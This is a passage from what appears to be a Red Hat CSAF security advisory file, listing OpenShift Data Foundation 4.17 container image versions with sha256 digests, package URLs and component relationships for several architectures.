"pkg:oci/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1?arch=amd64&repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", product: { name: "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", product_id: "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", product_identification_helper: { purl: "pkg:oci/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f?arch=amd64&repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", product: { name: "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", product_id: "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", product_identification_helper: { purl: "pkg:oci/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3?arch=amd64&repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", product: { name: "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", product_id: "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87?arch=amd64&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.17.0-40", }, }, }, { category: "product_version", name: "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", product: { name: "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", product_id: "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", product_identification_helper: { purl: "pkg:oci/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda?arch=amd64&repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", product: { name: "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", product_id: "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", product_identification_helper: { purl: "pkg:oci/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438?arch=amd64&repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", product: { name: "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", product_id: "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", product_identification_helper: { purl: "pkg:oci/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2?arch=amd64&repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator&tag=v4.17.0-51", }, }, }, ], category: "architecture", name: "amd64", }, { branches: [ { category: "product_version", name: "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", product: { name: "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", product_id: "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2?arch=arm64&repository_url=registry.redhat.io/odf4/cephcsi-rhel9-operator&tag=v4.17.0-15", }, }, }, { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", product: { name: "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", product_id: "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb?arch=arm64&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.17.0-69", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", product: { name: "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", product_id: "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505?arch=arm64&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.17.0-23", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", product: { name: "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", product_id: "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d?arch=arm64&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.17.0-31", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", product: { name: "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", product_id: "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be?arch=arm64&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.17.0-60", }, }, }, { category: "product_version", name: "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", product: { name: "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", product_id: "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", product_identification_helper: { purl: "pkg:oci/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0?arch=arm64&repository_url=registry.redhat.io/odf4/odf-cli-rhel9&tag=v4.17.0-29", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319?arch=arm64&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.17.0-30", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2?arch=arm64&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.17.0-30", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c?arch=arm64&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.17.0-17", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", product: { name: "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", product_id: "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db?arch=arm64&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.17.0-14", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", product: { name: "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", product_id: "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97?arch=arm64&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.17.0-20", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", product: { name: "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", product_id: "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae?arch=arm64&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.17.0-40", }, }, }, ], category: "architecture", name: "arm64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", }, product_reference: "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", }, product_reference: "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", }, product_reference: "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", }, product_reference: "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", }, product_reference: "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", }, product_reference: "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", }, product_reference: "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", }, product_reference: "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", }, product_reference: "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", }, product_reference: "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", }, product_reference: "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", }, product_reference: "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", }, product_reference: "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", }, product_reference: "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", }, product_reference: "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", }, product_reference: "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", }, product_reference: "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", }, product_reference: "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", }, product_reference: "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", }, product_reference: "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", }, product_reference: "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", }, product_reference: "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", }, product_reference: "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", }, product_reference: "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", }, product_reference: "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", }, product_reference: "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", }, product_reference: "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", }, product_reference: 